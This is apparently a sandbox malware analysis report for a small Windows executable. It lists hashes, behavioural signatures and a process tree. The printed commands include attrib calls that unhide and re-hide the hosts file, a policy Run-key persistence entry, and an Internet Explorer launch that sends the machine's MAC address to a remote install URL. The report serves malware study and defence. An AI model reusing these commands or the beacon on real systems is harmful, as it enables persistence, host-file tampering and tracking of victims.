Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
23/08/2024, 22:13
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe
Resource
win7-20240708-en
windows7-x64
12 signatures
150 seconds
Behavioral task
behavioral2
Sample
bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe
Resource
win10v2004-20240802-en
windows10-2004-x64
13 signatures
150 seconds
General
-
Target
bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe
-
Size
46KB
-
MD5
bd5ca4e52639067d28151719615b587d
-
SHA1
51718e6feef6d23a9b00536a28c9a4e259a7f45a
-
SHA256
83a2cd295660aa9acc296769b4af8607cc6ad9c37d16fe303590041e1ac31613
-
SHA512
87eae489684b9f470a27bf6a604df4966ca3e57f2392718b2504a63c29ba6aae9cf58ae166976ff3b15d7d892902f2d796b02c3f8ee806f4d765c0a53e8feb27
-
SSDEEP
768:oK7vMVvp3w/qUfsRd9Zsb5CDsaSur5dikXBgOHtg8mVD2wVyl3qU5dM9KRxXH5Y:HvMVvp3w/hcG5esaSur5AyH7q5VMp5dA
Score
8/10
Malware Config
Signatures
-
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\qq10000 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe" bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2676 attrib.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\win.ini bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31126953" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003f945ed72d44d3489ac9a36be9e2e8b1000000000200000000001066000000010000200000001f2b1592b5209c61ccbf7f57f52d9a2d602d08e4fb0563a18b593a03a4219498000000000e80000000020000200000004590dbcc8b02565bf3ff58e3b2a35ff8642a32b8bb322eb19e1f44049dedb77b200000004cb7e3e16c9823d2fc91a7999a5c4fc7f1b9446f003f8d373a24a81289a19b9c400000009cda2ba5cbd5fb58cee04664cb8c7699d0365815b7cfb4716a2cb51111c02ab589f1d483da95018590ed94e2ac3490ae43b31ec552ceb3f06464aa8d1e817aa1 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3363021209" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0491fc9a9f5da01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{F41CA126-619C-11EF-9A03-7221D8032630} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3363021209" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003f945ed72d44d3489ac9a36be9e2e8b100000000020000000000106600000001000020000000242b6ef1b480f5bcb11384f86b3119cf0b11f7b1551e3d4eba429dc6f7e546d5000000000e8000000002000020000000b244cfc88a805ba0398c5ddbcc345d13a151338402d31b892bc454ab1bcd344420000000f03f5b18cfcd28fa67390106f4196e8360e563de7dc9c37855d9adf8636c40b44000000007e8003f063165bf30ecf6cac4671e2d218e67284cf559bea9e6f99070f770c27e900cda4c4334049de88b893e88253c6c10179b51f4669b5fe4b311ad62a544 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b00424c9a9f5da01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31126953" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: 33 4744 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 4744 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4792 iexplore.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 4792 iexplore.exe 4792 iexplore.exe 4888 IEXPLORE.EXE 4888 IEXPLORE.EXE 4888 IEXPLORE.EXE 4888 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 4488 wrote to memory of 2316 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 87 PID 4488 wrote to memory of 2316 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 87 PID 4488 wrote to memory of 2316 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 87 PID 4488 wrote to memory of 2676 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 94 PID 4488 wrote to memory of 2676 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 94 PID 4488 wrote to memory of 2676 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 94 PID 4488 wrote to memory of 4792 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 99 PID 4488 wrote to memory of 4792 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 99 PID 4792 wrote to memory of 4888 4792 iexplore.exe 100 PID 4792 wrote to memory of 4888 4792 iexplore.exe 100 PID 4792 wrote to memory of 4888 4792 iexplore.exe 100 PID 4488 wrote to memory of 3424 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 56 PID 4488 wrote to memory of 3424 4488 bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe 56 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2316 attrib.exe 2676 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3424
-
C:\Users\Admin\AppData\Local\Temp\bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe"2⤵
- Adds policy Run key to start application
- Drops file in Drivers directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\SysWOW64\attrib.exeattrib -s -h "C:\Windows\system32\drivers\etc\hosts"3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2316
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Windows\system32\drivers\etc\hosts"3⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2676
-
-
C:\program files\internet explorer\iexplore.exe"C:\program files\internet explorer\iexplore.exe" "http://www.dnbqq.cn/234/install.asp?ver=090107&tgid=baizi&address=72-21-D8-03-26-30®k=1&flag=5ddf4dd11a496f259ee0319567740e7c&frandom=4346"3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4792 CREDAT:17410 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4888
-
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2f4 0x3101⤵
- Suspicious use of AdjustPrivilegeToken
PID:4744
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16KB
MD56d49c5734c3f3237b72e9bc69321c556
SHA16ece8bcad7986bc237c5b492d79eda599f02265b
SHA2565a1f0259386398409ec2ea8da1b4bda2770e57215f17fa4622afb5abd10e683e
SHA512f948a2e86b51597cdcaa3e4e71eb07b58f09a455561ba232bcf9b85f7ef3354647a4609334e2a8ec4fc40ec825330e551ed922f46b926354f4746a01fa7c148e